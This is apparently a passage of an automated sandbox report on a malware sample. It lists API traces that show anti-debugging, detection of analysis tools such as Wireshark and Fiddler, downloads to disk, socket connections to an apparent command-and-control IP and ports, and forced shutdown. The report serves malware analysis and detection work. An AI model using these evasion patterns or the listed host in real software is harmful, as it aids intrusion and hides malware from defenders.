• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 10324c9e82156273941819187f13adcb7fe0c51535d7bbc4f9251135d4250002
• Instruction ID: a61759eaa54b70cb38707303e76aacb594ce9ad1fba2e44a08eb0c0a6f230df0
• Opcode Fuzzy Hash: 10324c9e82156273941819187f13adcb7fe0c51535d7bbc4f9251135d4250002
• Instruction Fuzzy Hash: DF71C471D091596FDF109F28CC88AEEBBB8AF09308F2442D9F059A7650FB324E858F55
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 6C38C866
• IsDebuggerPresent.KERNEL32 ref: 6C38C932
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C38C94B
• UnhandledExceptionFilter.KERNEL32(?), ref: 6C38C955
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 55a5cb39c37dfdc15d5694e9b1540481bdd71df25ba884e2f8be00c43f16f0fb
• Instruction ID: cd13d3328903735e15510ce62489b4859ee93c5a3fd50f8d89ea66face201063
• Opcode Fuzzy Hash: 55a5cb39c37dfdc15d5694e9b1540481bdd71df25ba884e2f8be00c43f16f0fb
• Instruction Fuzzy Hash: D631F875D022189BDF20EF64D9497CDBBB8AF08304F1041EAE40DAB250EB719A858F45
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C393BA7
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C393BB1
• UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 6C393BBE
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: dc9abf3ae4693d943f0382b3443334011885ecc87345172afef4f7cecb1742fb
• Instruction ID: f56ba4ccf4f7bb470d075c6db53529371bf041161d08e0cbf54716cbb7a95fd1
• Opcode Fuzzy Hash: dc9abf3ae4693d943f0382b3443334011885ecc87345172afef4f7cecb1742fb
• Instruction Fuzzy Hash: 0C31C7B590121C9BCB61DF24D8887DDBBF8BF08314F5046EAE41CA7650EB709B858F45
Strings
Memory Dump Source
• Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3040000_Update.jbxd
Yara matches
Similarity
• API ID:
• String ID: l$ntdl
• API String ID: 0-924918826
• Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
• Instruction ID: 4a30b1414cc511c95662ed000d80d742aa823a5d7d37d050ec49f2d59bb53551
• Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
• Instruction Fuzzy Hash: 0821C3B5A016209FCF29EF18949872FBBE6EF85710B1581A9D605AF354EB34CA01C7D1
APIs
  • Part of subcall function 034E7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
  • Part of subcall function 034E7B70: OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
  • Part of subcall function 034E7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
  • Part of subcall function 034E7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
  • Part of subcall function 034E7B70: GetLastError.KERNEL32 ref: 034E7BD2
  • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BE0
• ExitWindowsEx.USER32(00000005,00000000), ref: 034EB471
  • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BFB
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID:
• API String ID: 681424410-0
• Opcode ID: 5ab4182ef3e2b54f49704a016581ca1a715ea0a2041fd7376db1f0c864f07955
• Instruction ID: d4673389378756fd25a333f11a24724291ca003dca64e8dd348c693c0960d007
• Opcode Fuzzy Hash: 5ab4182ef3e2b54f49704a016581ca1a715ea0a2041fd7376db1f0c864f07955
• Instruction Fuzzy Hash: 45C08C367802000ED214B3B67826FAAB740DF84337F00062FE70A8C0C00C53849501AA
APIs
  • Part of subcall function 034E7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
  • Part of subcall function 034E7B70: OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
  • Part of subcall function 034E7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
  • Part of subcall function 034E7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
  • Part of subcall function 034E7B70: GetLastError.KERNEL32 ref: 034E7BD2
  • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BE0
• ExitWindowsEx.USER32(00000004,00000000), ref: 034EB429
  • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BFB
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID:
• API String ID: 681424410-0
• Opcode ID: d66a7baddf58ba13681d651982df91a50127ab6f6384ce13c250b636048e88bd
• Instruction ID: a636c2bf35b8af7e5925b5ddd7f614e738845a2eb11d52768170557271e2893d
• Opcode Fuzzy Hash: d66a7baddf58ba13681d651982df91a50127ab6f6384ce13c250b636048e88bd
• Instruction Fuzzy Hash: 13C04C367802041ED214B7B67826FA9B740DF94737F50466FE70A9C0D04C67949551AE
APIs
  • Part of subcall function 034E7B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 034E7B89
  • Part of subcall function 034E7B70: OpenProcessToken.ADVAPI32(00000000), ref: 034E7B90
  • Part of subcall function 034E7B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 034E7BB6
  • Part of subcall function 034E7B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 034E7BCC
  • Part of subcall function 034E7B70: GetLastError.KERNEL32 ref: 034E7BD2
  • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BE0
• ExitWindowsEx.USER32(00000006,00000000), ref: 034EB44D
  • Part of subcall function 034E7B70: CloseHandle.KERNEL32(?), ref: 034E7BFB
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID:
• API String ID: 681424410-0
• Opcode ID: 36e52c52275269d618803105ac0de62cb0e064d44e01ab078eceb5114f6c60dd
• Instruction ID: 19440cc9b7cb847451d0c3f6f06df645f89c4995624b620e689b845bc873c5b6
• Opcode Fuzzy Hash: 36e52c52275269d618803105ac0de62cb0e064d44e01ab078eceb5114f6c60dd
• Instruction Fuzzy Hash: 7DC04C367802041ED214B7B67826FAAB741DF94737F50466FE60A9C0D04C5794A551AA
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00001770,000210D3), ref: 00021769
Memory Dump Source
• Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_20000_Update.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 820f74a876ac7edbd6fd730b0338a772056c0ae38bb2f8772e5092a16f1475d2
• Instruction ID: 72f4e71403ef172630e9f4d921635a31af2f3fb1bf2705bb2136757d700a6015
• Opcode Fuzzy Hash: 820f74a876ac7edbd6fd730b0338a772056c0ae38bb2f8772e5092a16f1475d2
• Instruction Fuzzy Hash:
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
• Instruction ID: d120686cb65c05db9ad377b88b6e9693dca83b5791753b271493562881fbd61f
• Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
• Instruction Fuzzy Hash: E7318C76A0834B8FCB10DF18C480966B7E4FFC9318F1A096DE89597312D3B5F9958B91
APIs
  • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
• RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 034EB586
• RegDeleteValueW.ADVAPI32(?,IpDate), ref: 034EB596
• RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 034EB5B3
• _memset.LIBCMT ref: 034EB5D4
• RegCloseKey.ADVAPI32(?), ref: 034EB61B
• _memset.LIBCMT ref: 034EB63C
• RegCloseKey.ADVAPI32(?), ref: 034EB72C
• Sleep.KERNEL32(000007D0), ref: 034EB737
  • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF756
  • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF770
  • Part of subcall function 034EF707: __CxxThrowException@8.LIBCMT ref: 034EF781
Strings
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
• String ID: 134.122.155.39$134.122.155.39$134.122.155.39$15091$15092$15093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
• API String ID: 1186799303-392579377
• Opcode ID: 92d120c9103a46976770ecdf8ed32043e291dae8c62618ed1930227fa04b9e45
• Instruction ID: ae3dd442ee004b4de8c2af3a07ee1ca4f9baace36891171f3f1b9d56f909b1e5
• Opcode Fuzzy Hash: 92d120c9103a46976770ecdf8ed32043e291dae8c62618ed1930227fa04b9e45
• Instruction Fuzzy Hash: 0741F4757843007FE610E611AC8BF1E7364AF45F12F144819FA147E2D3E6E2A919CAAF
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F401C
                                                                                            • __mtterm.LIBCMT ref: 034F4028
                                                                                              • Part of subcall function 034F3CF1: DecodePointer.KERNEL32(0000000A,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F3D02
                                                                                              • Part of subcall function 034F3CF1: TlsFree.KERNEL32(00000021,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F3D1C
                                                                                              • Part of subcall function 034F3CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F8D48
                                                                                              • Part of subcall function 034F3CF1: _free.LIBCMT ref: 034F8D4B
                                                                                              • Part of subcall function 034F3CF1: DeleteCriticalSection.KERNEL32(00000021,?,?,034F1084,034F106A,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F8D72
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 034F403E
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 034F404B
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 034F4058
                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 034F4065
                                                                                            • TlsAlloc.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40B5
                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40D0
                                                                                            • __init_pointers.LIBCMT ref: 034F40DA
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40EB
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F40F8
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4105
                                                                                            • EncodePointer.KERNEL32(?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4112
                                                                                            • DecodePointer.KERNEL32(Function_00013E75,?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4133
                                                                                            • __calloc_crt.LIBCMT ref: 034F4148
                                                                                            • DecodePointer.KERNEL32(00000000,?,?,034F0FC1,03506278,00000008,034F1155,?,?,?,03506298,0000000C,034F1210,?), ref: 034F4162
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034F4174
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                            • API String ID: 3698121176-3819984048
                                                                                            • Opcode ID: c1fb622c4b4f03f8b941759f3d269b5f615c510b3f6765ba904c059a53b7655d
                                                                                            • Instruction ID: 6767da08e67c6e5919f01a29432acce52d54beefe914c4fc272728ee29d17cb3
                                                                                            • Opcode Fuzzy Hash: c1fb622c4b4f03f8b941759f3d269b5f615c510b3f6765ba904c059a53b7655d
                                                                                            • Instruction Fuzzy Hash: 06312E75900215AED750FF77E948D2A7EA4AB48764B19061BE9108B3FCEB31808AFE54
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset$_wcsrchrlstrcat$EnvironmentExpandStringslstrlenwsprintf
                                                                                            • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                            • API String ID: 3970221696-33419044
                                                                                            • Opcode ID: 265defd800ead7741a3823a0362ae056bc671fbb0e63e9968ffadb8c9dfa3de9
                                                                                            • Instruction ID: f3e2e4c16adf8b6dc0100624b2dfae7955d04c023e760aecbfc09579d6b44143
                                                                                            • Opcode Fuzzy Hash: 265defd800ead7741a3823a0362ae056bc671fbb0e63e9968ffadb8c9dfa3de9
                                                                                            • Instruction Fuzzy Hash: C25111B59403186EDB20E760CC85FEF73789F54701F0445DAE709ED180EA719A45CFA9
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(wininet.dll), ref: 034E7CC3
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 034E7CD7
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 034E7CF7
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 034E7D16
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 034E7D53
                                                                                            • _memset.LIBCMT ref: 034E7D7E
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 034E7D8C
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 034E7DDB
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E7DF9
                                                                                            • Sleep.KERNEL32(00000001), ref: 034E7E01
                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 034E7E0D
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 034E7E28
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                            • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                            • API String ID: 1463273941-1099148085
                                                                                            • Opcode ID: 1f1e6d6f0448212871400f7f0ba857f97ba8da5a3abc6b74679503d4e00bfd2e
                                                                                            • Instruction ID: 3aebffe64f5a92a3743820bf5519500225bdd970cb59de2bacad7cb76f5e85e8
                                                                                            • Opcode Fuzzy Hash: 1f1e6d6f0448212871400f7f0ba857f97ba8da5a3abc6b74679503d4e00bfd2e
                                                                                            • Instruction Fuzzy Hash: 7541C671A4021CABDB20EB649C45FEEB7F8BF44701F14C5E9E648AA280DE715A468FD4
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 034E455A
                                                                                            • timeGetTime.WINMM ref: 034E457B
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E459B
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 034E45BD
                                                                                            • SwitchToThread.KERNEL32 ref: 034E45D7
                                                                                            • SetEvent.KERNEL32(?), ref: 034E4620
                                                                                            • CloseHandle.KERNEL32(?), ref: 034E4644
                                                                                            • send.WS2_32(?,035049C0,00000010,00000000), ref: 034E4668
                                                                                            • SetEvent.KERNEL32(?), ref: 034E4686
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E4691
                                                                                            • WSACloseEvent.WS2_32(?), ref: 034E469F
                                                                                            • shutdown.WS2_32(?,00000001), ref: 034E46B3
                                                                                            • closesocket.WS2_32(?), ref: 034E46BD
                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 034E46F6
                                                                                            • SetLastError.KERNEL32(000005B4), ref: 034E470A
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E472B
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 034E4743
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 1692523546-0
                                                                                            • Opcode ID: 44f943d1b3f7f855233b3b35038ac6ddcb497a1d2b2e094a626ad061a8101a09
                                                                                            • Instruction ID: 5516207c4863b04e81301aff9b8799b4fd9ad10d09a0328eff666d72cf269872
                                                                                            • Opcode Fuzzy Hash: 44f943d1b3f7f855233b3b35038ac6ddcb497a1d2b2e094a626ad061a8101a09
                                                                                            • Instruction Fuzzy Hash: 8F91DD34600602AFC724DF66D888BAAF7A9FF44306F04851AE5168FB64C735F896CBD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memset$swprintf$_malloc
                                                                                            • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                            • API String ID: 1873853019-591889663
                                                                                            • Opcode ID: ca79671e527f554dcecd2d3846b857280172d9bf13b705f9033b8c8e4ea809c4
                                                                                            • Instruction ID: d1bf49152a4608664f5e864b06d087ec07e41936dc765edee783176d655102c8
                                                                                            • Opcode Fuzzy Hash: ca79671e527f554dcecd2d3846b857280172d9bf13b705f9033b8c8e4ea809c4
                                                                                            • Instruction Fuzzy Hash: 8E8104B9A40300AFE710EF14EC86F6B77A4AF45711F094169ED185F383E771E914CAAA
                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 00912D72
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00912D7E
                                                                                            • timeGetTime.WINMM ref: 00912D84
                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00912DB1
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 00912DDD
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00912DE9
                                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 00912E08
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 00912E14
                                                                                            • gethostbyname.WS2_32(00000000), ref: 00912E22
                                                                                            • htons.WS2_32(?), ref: 00912E44
                                                                                            • connect.WS2_32(?,?,00000010), ref: 00912E62
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                            • String ID: 0u
                                                                                            • API String ID: 640718063-3203441087
                                                                                            • Opcode ID: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                                            • Instruction ID: 2d4409480145eb5ddf4838dc74e4eba1e4cca12f9e5f4263a2ed90292e83dbe2
                                                                                            • Opcode Fuzzy Hash: 39edbacc94200cba1e2c05282cef4647c34456396228b0fcf87ba83b1cc88278
                                                                                            • Instruction Fuzzy Hash: 26614071A40308BFE720DFA4DC85FAAB7B8FF48711F104619F646AB2D0D7B1A9448B64
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 034E5CD3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: VisibleWindow
                                                                                            • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                            • API String ID: 1208467747-3439171801
                                                                                            • Opcode ID: 009cbe5ad9d5998b34860ab520c00e85d18da5be5d320c9ba8d493a12b99e251
                                                                                            • Instruction ID: 0ce7f565747e25b7b2d973f7188019d6cd0dbfaebcd131bd8941b8abcd2c4927
                                                                                            • Opcode Fuzzy Hash: 009cbe5ad9d5998b34860ab520c00e85d18da5be5d320c9ba8d493a12b99e251
                                                                                            • Instruction Fuzzy Hash: B9413A6AE45712AEDB61E6367C02F9F214C1E6348BB0C00AAED5CEC247F74AD21544AE
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000064), ref: 00914531
                                                                                            • timeGetTime.WINMM ref: 00914552
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00914572
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00914594
                                                                                            • SwitchToThread.KERNEL32 ref: 009145AE
                                                                                            • SetEvent.KERNEL32(?), ref: 009145F7
                                                                                            • CloseHandle.KERNEL32(?), ref: 0091461B
                                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 0091463F
                                                                                            • SetEvent.KERNEL32(?), ref: 0091465D
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00914668
                                                                                            • WSACloseEvent.WS2_32(?), ref: 00914676
                                                                                            • shutdown.WS2_32(?,00000001), ref: 0091468A
                                                                                            • closesocket.WS2_32(?), ref: 00914694
                                                                                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 009146CD
                                                                                            • SetLastError.KERNEL32(000005B4), ref: 009146E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Event$CloseErrorExchangeInterlockedLastThread$CompareCurrentHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 1063552937-0
                                                                                            • Opcode ID: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                                            • Instruction ID: 6b631afc6d431ba96dad0fd830d392ab964c42d0a41015638641d04497129dd9
                                                                                            • Opcode Fuzzy Hash: 5c9eb4c72f87222164f91e2bd37fc10ff7097731acfcc2078ffaff40636bb074
                                                                                            • Instruction Fuzzy Hash: DA51AD7170062AEBD725DF64C888BE9B7AAFF49346F148115F6058AA80C775E8E0CBD0
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,034EA8C1,?,?), ref: 034EDA43
